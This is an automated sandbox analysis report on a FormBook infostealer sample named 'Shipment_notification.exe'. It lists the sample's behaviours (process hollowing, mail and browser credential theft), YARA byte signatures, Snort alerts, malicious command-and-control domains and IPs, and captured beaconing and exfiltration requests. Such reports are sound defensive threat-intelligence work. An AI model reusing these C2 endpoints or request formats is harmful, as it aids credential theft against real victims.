Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipment_notification.exe

Overview

General Information

Sample Name:Shipment_notification.exe
Analysis ID:830738
MD5:c310a64af890ac32abff89e86cb53a33
SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Shipment_notification.exe (PID: 1348 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 2344 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 3968 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Shipment_notification.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.Shipment_notification.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbdc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.Shipment_notification.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb98d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edfa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdad:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Shipment_notification.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Shipment_notification.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5198.177.124.5749706802031453 03/20/23-16:50:29.247456
          SID:2031453
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031453 03/20/23-16:50:05.917395
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5198.177.124.5749706802031412 03/20/23-16:50:29.247456
          SID:2031412
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031453 03/20/23-16:50:21.020230
          SID:2031453
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5198.177.124.5749706802031449 03/20/23-16:50:29.247456
          SID:2031449
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031412 03/20/23-16:50:21.020230
          SID:2031412
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031449 03/20/23-16:50:05.917395
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031449 03/20/23-16:50:21.020230
          SID:2031449
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031412 03/20/23-16:50:05.917395
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Shipment_notification.exeReversingLabs: Detection: 39%
          Source: Shipment_notification.exeVirustotal: Detection: 43%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.ywtxsm.com/rs5b/PrAvira URL Cloud: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikUAvira URL Cloud: Label: phishing
          Source: http://www.drkathleensanders.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.peramid.xyz/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.piergitarshoes.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfdAvira URL Cloud: Label: phishing
          Source: http://www.amirah.cfd/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.ywtxsm.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: phishing
          Source: http://www.isabellagambitta.com/rs5b/Avira URL Cloud: Label: phishing
          Source: http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.peramid.xyzAvira URL Cloud: Label: malware
          Source: http://www.53876.worldAvira URL Cloud: Label: malware
          Source: http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.53876.world/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.carcosainvest.com/rs5b/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Shipment_notification.exeJoe Sandbox ML: detected
          Source: 2.2.Shipment_notification.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Shipment_notification.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Shipment_notification.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 206.54.190.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.218.155.8 80
          Source: C:\Windows\explorer.exeDomain query: www.tcatelier.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.114.105.2 80
          Source: C:\Windows\explorer.exeDomain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exeDomain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exeDomain query: www.peramid.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80
          Source: C:\Windows\explorer.exeDomain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exeDomain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.27.134.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.158 80
          Source: C:\Windows\explorer.exeDomain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.drkathleensanders.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.peramid.xyz
          Source: Joe Sandbox ViewASN Name: FINALFRONTIERVG FINALFRONTIERVG
          Source: Joe Sandbox ViewASN Name: WZCOM-US WZCOM-US
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.carcosainvest.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.carcosainvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.carcosainvest.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 71 4d 38 79 7a 57 54 77 55 4a 41 42 4c 39 4a 59 6b 2d 38 44 5a 34 4d 5f 54 66 79 45 38 38 7e 44 37 73 37 4e 7e 45 63 5a 58 6b 58 6b 70 33 31 6c 7e 4c 35 76 55 39 64 7a 4b 4b 41 51 70 70 42 45 49 54 72 35 65 54 41 50 54 72 30 35 67 44 32 4d 76 62 49 37 72 41 57 43 6f 4a 6a 69 55 2d 38 52 54 4f 4d 4c 7e 34 57 53 4e 4a 73 7a 71 75 6c 30 48 4c 65 6f 33 5f 43 51 66 69 28 51 63 73 35 7a 70 58 59 49 37 77 79 46 77 4a 72 64 65 71 28 53 32 61 57 5f 77 56 63 71 36 38 46 77 45 46 57 4e 67 67 52 5f 65 54 6a 64 6c 56 39 4d 79 6e 47 50 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.piergitarshoes.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.piergitarshoes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.piergitarshoes.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 7e 6a 7a 4d 68 55 53 42 31 53 6c 4b 58 34 70 66 36 72 63 33 71 6e 54 4d 49 49 61 59 7e 6f 7e 41 69 46 47 35 65 45 4a 54 44 62 46 74 39 45 4b 6c 33 33 76 75 4d 73 66 55 76 37 62 61 44 61 70 32 4d 4c 59 50 43 51 51 5f 4c 69 67 31 73 43 31 77 30 44 74 75 6e 7a 4f 72 70 32 68 4a 46 69 6f 4d 4c 4b 34 46 4b 78 48 4f 51 71 6d 4a 6c 34 44 4f 51 79 46 62 6d 4e 67 5f 34 51 50 33 47 79 71 59 37 4f 68 6a 49 59 39 34 42 7a 5a 4c 71 6a 31 64 51 33 34 48 4f 69 39 44 46 6f 59 72 38 77 57 54 28 34 6d 51 51 77 7a 62 71 73 6e 37 6a 7a 4a 59 35 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.ywtxsm.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.ywtxsm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ywtxsm.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 50 47 36 75 30 55 43 37 51 4e 52 56 53 32 47 4a 65 45 36 54 64 48 56 4b 51 63 4c 6d 38 69 46 35 4b 68 72 68 34 70 35 58 31 68 37 7a 79 51 30 4c 28 35 6a 4d 56 66 28 6a 74 5a 55 55 32 59 35 39 39 42 6c 77 76 68 35 53 61 59 32 7a 5a 73 44 4b 57 39 5a 49 5a 4c 58 54 4d 70 6e 76 65 75 49 48 54 49 66 50 56 33 59 4e 38 66 62 61 42 6d 4c 32 4f 45 4e 77 69 69 69 58 4d 4e 34 4d 78 5a 6e 68 30 6c 62 35 72 6d 39 79 31 6b 56 6c 73 30 79 69 77 63 61 41 4b 54 36 79 59 78 6a 42 42 52 6d 51 77 49 48 64 72 77 37 43 42 73 58 41 34 30 72 58 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.peramid.xyzConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.peramid.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.peramid.xyz/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 6b 4e 49 33 52 4d 52 50 72 2d 32 47 68 42 4a 56 37 6b 51 76 38 65 6c 30 46 72 73 77 79 61 70 38 57 56 55 6f 38 77 6d 63 70 74 71 6e 6a 45 35 41 52 4f 45 5a 74 71 37 46 74 54 4e 49 28 78 44 55 61 6c 73 70 6e 33 28 37 56 70 61 79 7a 6c 6a 58 59 72 4c 30 51 35 46 7a 53 6d 49 73 4e 78 55 5f 37 2d 56 34 4c 36 71 36 73 61 70 79 32 4f 65 57 32 74 46 57 66 7a 5a 6e 56 50 4d 55 52 75 44 41 7e 50 65 4c 34 61 74 77 6e 52 31 4b 79 41 63 71 6a 32 77 67 57 44 38 75 43 6f 58 6f 33 4d 7e 44 41 45 62 73 37 46 69 45 68 65 54 75 66 66 54 4c 4f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
